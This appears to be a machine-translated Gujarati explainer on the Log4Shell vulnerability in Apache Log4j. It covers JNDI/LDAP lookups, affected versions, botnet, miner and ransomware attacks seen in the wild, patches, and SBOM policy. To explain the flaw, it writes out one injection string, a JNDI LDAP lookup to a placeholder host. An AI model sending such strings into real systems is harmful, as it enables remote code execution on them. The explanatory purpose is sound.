સામગ્રીનું કોષ્ટક[છુપાવો][બતાવો]
નવેમ્બર 2021 ના અંતમાં, અમે સાયબર સુરક્ષા માટેના મોટા ખતરાનો પર્દાફાશ કર્યો. આ શોષણ સંભવિતપણે વિશ્વભરની લાખો કમ્પ્યુટર સિસ્ટમોને અસર કરશે.
આ Log4j નબળાઈ પર માર્ગદર્શિકા છે અને કેવી રીતે અવગણવામાં આવેલી ડિઝાઇન ખામીએ વિશ્વની 90% થી વધુ કમ્પ્યુટર સેવાઓ હુમલા માટે ખુલ્લી છોડી દીધી છે.
Apache Log4j એ અપાચે સોફ્ટવેર ફાઉન્ડેશન દ્વારા વિકસિત ઓપન સોર્સ જાવા-આધારિત લોગીંગ યુટિલિટી છે. મૂળ 2001 માં Ceki Gülcü દ્વારા લખાયેલ, તે હવે અપાચે લોગીંગ સેવાઓનો એક ભાગ છે, જે અપાચે સોફ્ટવેર ફાઉન્ડેશનનો પ્રોજેક્ટ છે.
વિશ્વભરની કંપનીઓ તેમની એપ્લિકેશનો પર લોગિંગ સક્ષમ કરવા માટે Log4j લાઇબ્રેરીનો ઉપયોગ કરે છે. વાસ્તવમાં, જાવા લાઇબ્રેરી એટલી સર્વવ્યાપક છે, તમે તેને એમેઝોન, માઇક્રોસોફ્ટ, ગૂગલ અને વધુની એપ્લિકેશન્સમાં શોધી શકો છો.
લાઇબ્રેરીની પ્રાધાન્યતાનો અર્થ એ છે કે કોડમાં કોઈપણ સંભવિત ખામી લાખો કમ્પ્યુટર્સને હેકિંગ માટે ખુલ્લા છોડી શકે છે. 24મી નવેમ્બર 2021ના રોજ, એ વાદળ સુરક્ષા અલીબાબા માટે કામ કરતા સંશોધકે એક ભયંકર ખામી શોધી કાઢી.
Log4j નબળાઈ, જેને Log4Shell તરીકે પણ ઓળખવામાં આવે છે, તે 2013 થી કોઈનું ધ્યાન ગયું નથી. નબળાઈએ દૂષિત અભિનેતાઓને Log4j ચલાવતી અસરગ્રસ્ત સિસ્ટમો પર કોડ ચલાવવાની મંજૂરી આપી. તે 9મી ડિસેમ્બર, 2021ના રોજ જાહેરમાં જાહેર કરવામાં આવ્યું હતું
ઉદ્યોગ નિષ્ણાતો લોગ 4 શેલ ખામીને કહે છે તાજેતરની મેમરીમાં સૌથી મોટી નબળાઈ.
નબળાઈના પ્રકાશન પછીના અઠવાડિયામાં, સાયબર સુરક્ષા ટીમોએ લાખો હુમલાઓ શોધી કાઢ્યા. કેટલાક સંશોધકોએ દર મિનિટે સોથી વધુ હુમલાનો દર પણ જોયો છે.
તે કેવી રીતે કામ કરે છે?
Log4Shell શા માટે આટલું જોખમી છે તે સમજવા માટે, આપણે તે શું સક્ષમ છે તે સમજવાની જરૂર છે.
Log4Shell નબળાઈ મનસ્વી કોડ એક્ઝેક્યુશન માટે પરવાનગી આપે છે, જેનો મૂળભૂત અર્થ એ છે કે હુમલાખોર લક્ષ્ય મશીન પર કોઈપણ આદેશ અથવા કોડ ચલાવી શકે છે.
તે આ કેવી રીતે પરિપૂર્ણ કરે છે?
પ્રથમ, આપણે જેએનડીઆઈ શું છે તે સમજવાની જરૂર છે.
જાવા નામકરણ અને ડિરેક્ટરી ઈન્ટરફેસ (JNDI) એ જાવા સેવા છે જે જાવા પ્રોગ્રામ્સને નામ દ્વારા ડેટા અને સંસાધનો શોધવા અને શોધવાની મંજૂરી આપે છે. આ ડિરેક્ટરી સેવાઓ મહત્વપૂર્ણ છે કારણ કે તેઓ એપ્લિકેશન બનાવતી વખતે વિકાસકર્તાઓને સરળતાથી સંદર્ભ આપવા માટે રેકોર્ડ્સનો સંગઠિત સમૂહ પ્રદાન કરે છે.
JNDI ચોક્કસ નિર્દેશિકાને ઍક્સેસ કરવા માટે વિવિધ પ્રોટોકોલનો ઉપયોગ કરી શકે છે. આ પ્રોટોકોલમાંથી એક લાઇટવેઇટ ડિરેક્ટરી એક્સેસ પ્રોટોકોલ અથવા LDAP છે.
સ્ટ્રીંગ લોગીંગ કરતી વખતે, log4j જ્યારે તેઓ ફોર્મના અભિવ્યક્તિઓનો સામનો કરે છે ત્યારે સ્ટ્રિંગ અવેજી કરે છે ${prefix:name}
.
દાખ્લા તરીકે, Text: ${java:version}
ટેક્સ્ટ તરીકે લૉગ ઇન થઈ શકે છે: Java સંસ્કરણ 1.8.0_65. આ પ્રકારના અવેજી સામાન્ય છે.
અમે પણ જેમ કે અભિવ્યક્તિઓ હોઈ શકે છે Text: ${jndi:ldap://example.com/file}
જે LDAP પ્રોટોકોલ દ્વારા URL માંથી જાવા ઓબ્જેક્ટ લોડ કરવા માટે JNDI સિસ્ટમનો ઉપયોગ કરે છે.
આ તે URL માંથી આવતા ડેટાને મશીનમાં અસરકારક રીતે લોડ કરે છે. કોઈપણ સંભવિત હેકર સાર્વજનિક URL પર દૂષિત કોડ હોસ્ટ કરી શકે છે અને તેને લોગ કરવા માટે Log4j નો ઉપયોગ કરીને મશીનોની રાહ જોઈ શકે છે.
લોગ સંદેશાઓની સામગ્રીમાં વપરાશકર્તા-નિયંત્રિત ડેટા હોવાથી, હેકર્સ તેમના પોતાના JNDI સંદર્ભો દાખલ કરી શકે છે જે તેઓ નિયંત્રિત કરે છે તે LDAP સર્વર્સ તરફ નિર્દેશ કરે છે. આ LDAP સર્વર્સ દૂષિત જાવા ઑબ્જેક્ટથી ભરેલા હોઈ શકે છે જેને JNDI નબળાઈ દ્વારા એક્ઝિક્યુટ કરી શકે છે.
શું આને વધુ ખરાબ બનાવે છે તે એ છે કે એપ્લિકેશન સર્વર-સાઇડ અથવા ક્લાયંટ-સાઇડ એપ્લિકેશન છે કે કેમ તે કોઈ વાંધો નથી.
જ્યાં સુધી લોગર માટે હુમલાખોરના દૂષિત કોડને વાંચવાનો માર્ગ હોય ત્યાં સુધી, એપ્લિકેશન હજુ પણ શોષણ માટે ખુલ્લી છે.
કોણ અસર કરે છે?
નબળાઈ એ તમામ સિસ્ટમો અને સેવાઓને અસર કરે છે જે APache Log4j નો ઉપયોગ કરે છે, 2.0 સુધીના સંસ્કરણો અને 2.14.1 સહિત.
કેટલાક સુરક્ષા નિષ્ણાતો સલાહ આપે છે કે નબળાઈ Java નો ઉપયોગ કરીને સંખ્યાબંધ એપ્લિકેશનોને અસર કરી શકે છે.
આ ખામી સૌપ્રથમ માઇક્રોસોફ્ટની માલિકીની Minecraft વિડિયો ગેમમાં મળી આવી હતી. માઇક્રોસોફ્ટે તેમના વપરાશકર્તાઓને કોઈપણ જોખમને રોકવા માટે તેમના Java એડિશન Minecraft સોફ્ટવેરને અપગ્રેડ કરવા વિનંતી કરી છે.
સાયબર સિક્યુરિટી એન્ડ ઈન્ફ્રાસ્ટ્રક્ચર સિક્યોરિટી એજન્સી (CISA) ના ડિરેક્ટર જેન ઈસ્ટરલી કહે છે કે વિક્રેતાઓ પાસે મુખ્ય જવાબદારી આ નબળાઈનું શોષણ કરતા દૂષિત અભિનેતાઓથી અંતિમ વપરાશકર્તાઓને રોકવા માટે.
"વિક્રેતાઓએ તેમના ગ્રાહકો સાથે પણ વાતચીત કરવી જોઈએ જેથી કરીને અંતિમ-વપરાશકર્તાઓ જાણે કે તેમના ઉત્પાદનમાં આ નબળાઈ છે અને સોફ્ટવેર અપડેટ્સને પ્રાથમિકતા આપવી જોઈએ."
અહેવાલ મુજબ હુમલાઓ શરૂ થઈ ચૂક્યા છે. Symantec, એક કંપની જે સાયબર સુરક્ષા સોફ્ટવેર પ્રદાન કરે છે, તેણે વિવિધ સંખ્યામાં હુમલાની વિનંતીઓ જોઈ છે.
સંશોધકોએ શોધી કાઢેલા હુમલાના પ્રકારોના અહીં કેટલાક ઉદાહરણો છે:
- botnets
બોટનેટ એ કમ્પ્યુટર્સનું નેટવર્ક છે જે એક જ હુમલાખોર પક્ષના નિયંત્રણ હેઠળ છે. તેઓ DDoS હુમલા કરવામાં, ડેટા ચોરી કરવામાં અને અન્ય કૌભાંડો કરવામાં મદદ કરે છે. સંશોધકોએ Log4j શોષણમાંથી ડાઉનલોડ કરેલ શેલ સ્ક્રિપ્ટ્સમાં મુહસ્તિક બોટનેટનું અવલોકન કર્યું.
- XMRig ખાણિયો ટ્રોજન
XMRig એક ઓપન-સોર્સ ક્રિપ્ટોકરન્સી ખાણિયો છે જે મોનેરો ટોકનને ખાણ કરવા માટે CPU નો ઉપયોગ કરે છે. સાયબર અપરાધીઓ લોકોના ઉપકરણો પર XMRig ઇન્સ્ટોલ કરી શકે છે જેથી તેઓ તેમની જાણ વગર તેમની પ્રોસેસિંગ પાવરનો ઉપયોગ કરી શકે.
- ઢોંસરી રેન્સમવેર
રેન્સમવેર એ મૉલવેરના સ્વરૂપનો સંદર્ભ આપે છે જેના માટે રચાયેલ છે એન્ક્રિપ્ટ ફાઇલો કમ્પ્યુટર પર. હુમલાખોરો પછી એન્ક્રિપ્ટેડ ફાઈલોની ઍક્સેસ પરત આપવાના બદલામાં ચુકવણીની માંગ કરી શકે છે. સંશોધકોએ Log4Shell હુમલામાં ખોન્સરી રેન્સમવેરની શોધ કરી હતી. તેઓ વિન્ડોઝ સર્વરને લક્ષ્ય બનાવે છે અને .NET ફ્રેમવર્કનો ઉપયોગ કરે છે.
આગળ શું થાય છે?
નિષ્ણાતો આગાહી કરે છે કે Log4J નબળાઈ દ્વારા લાવવામાં આવેલી અરાજકતાને સંપૂર્ણ રીતે ઠીક કરવામાં મહિનાઓ અથવા કદાચ વર્ષો પણ લાગી શકે છે.
આ પ્રક્રિયામાં દરેક અસરગ્રસ્ત સિસ્ટમને પેચ કરેલ સંસ્કરણ સાથે અપડેટ કરવાનો સમાવેશ થાય છે. જો આ બધી સિસ્ટમો પેચ કરેલી હોય, તો પણ સંભવિત બેકડોરનો ભય હજુ પણ છે જે હેકર્સે પહેલાથી જ વિન્ડોમાં ઉમેર્યું હશે કે સર્વર હુમલા માટે ખુલ્લા હતા.
ઘણા ઉકેલો અને શમન એપ્લિકેશનોને આ ભૂલ દ્વારા શોષણથી રોકવા માટે અસ્તિત્વમાં છે. નવા Log4j વર્ઝન 2.15.0-rc1 એ આ નબળાઈને ઘટાડવા માટે વિવિધ સેટિંગ્સ બદલી છે.
JNDI નો ઉપયોગ કરતી તમામ સુવિધાઓ ડિફોલ્ટ રૂપે અક્ષમ કરવામાં આવશે અને રિમોટ લુકઅપ્સ પણ પ્રતિબંધિત કરવામાં આવ્યા છે. તમારા Log4j સેટઅપ પર લુકઅપ સુવિધાને અક્ષમ કરવાથી સંભવિત શોષણના જોખમને ઘટાડવામાં મદદ મળશે.
Log4j ની બહાર, ઓપન-સોર્સ શોષણને રોકવા માટે હજુ પણ વ્યાપક યોજનાની જરૂર છે.
અગાઉ મે મહિનામાં વ્હાઇટ હાઉસે એક જાહેર કર્યું હતું એક્ઝિક્યુટિવ ઓર્ડર જેનો હેતુ રાષ્ટ્રીય સાયબર સુરક્ષામાં સુધારો કરવાનો હતો. તેમાં સૉફ્ટવેર બિલ ઑફ મટિરિયલ્સ (SBOM) માટેની જોગવાઈનો સમાવેશ થાય છે જે આવશ્યકપણે એક ઔપચારિક દસ્તાવેજ હતો જેમાં એપ્લિકેશન બનાવવા માટે જરૂરી દરેક વસ્તુઓની સૂચિ હતી.
આમાં જેવા ભાગોનો સમાવેશ થાય છે ઓપન સોર્સ વિકાસ માટે ઉપયોગમાં લેવાતા પેકેજો, નિર્ભરતા અને API. જોકે SBOM નો વિચાર પારદર્શકતા માટે મદદરૂપ છે, શું તે ખરેખર ગ્રાહકને મદદ કરશે?
અવલંબનને અપગ્રેડ કરવું એ ઘણી મુશ્કેલી હોઈ શકે છે. કંપનીઓ વૈકલ્પિક પેકેજો શોધવામાં વધારાનો સમય બગાડવાનું જોખમ લેવાને બદલે કોઈપણ દંડ ભરવાનું પસંદ કરી શકે છે. કદાચ આ SBOM માત્ર ત્યારે જ ઉપયોગી થશે જો તેમના અવકાશ વધુ મર્યાદિત છે.
ઉપસંહાર
Log4j સમસ્યા એ સંસ્થાઓ માટે તકનીકી સમસ્યા કરતાં વધુ છે.
વ્યાપારી નેતાઓએ સંભવિત જોખમોથી વાકેફ હોવા જોઈએ જે ત્યારે થઈ શકે છે જ્યારે તેમના સર્વર, ઉત્પાદનો અથવા સેવાઓ કોડ પર આધાર રાખે છે જે તેઓ પોતે જાળવતા નથી.
ઓપન-સોર્સ અને તૃતીય પક્ષ એપ્લિકેશનો પર આધાર રાખવો હંમેશા અમુક જોખમ સાથે આવે છે. નવા જોખમો પ્રકાશમાં આવે તે પહેલાં કંપનીઓએ જોખમ ઘટાડવાની વ્યૂહરચનાઓ પર કામ કરવાનું વિચારવું જોઈએ.
મોટાભાગની વેબ વિશ્વભરના હજારો સ્વયંસેવકો દ્વારા સંચાલિત ઓપન-સોર્સ સોફ્ટવેર પર આધાર રાખે છે.
જો આપણે વેબને એક સુરક્ષિત સ્થાન રાખવા માંગીએ છીએ, તો સરકારો અને કોર્પોરેશનોએ ઓપન સોર્સ પ્રયાસો અને સાયબર સુરક્ષા એજન્સીઓને ભંડોળ પૂરું પાડવામાં રોકાણ કરવું જોઈએ જેમ કે સીઆઈએસએ.
એક જવાબ છોડો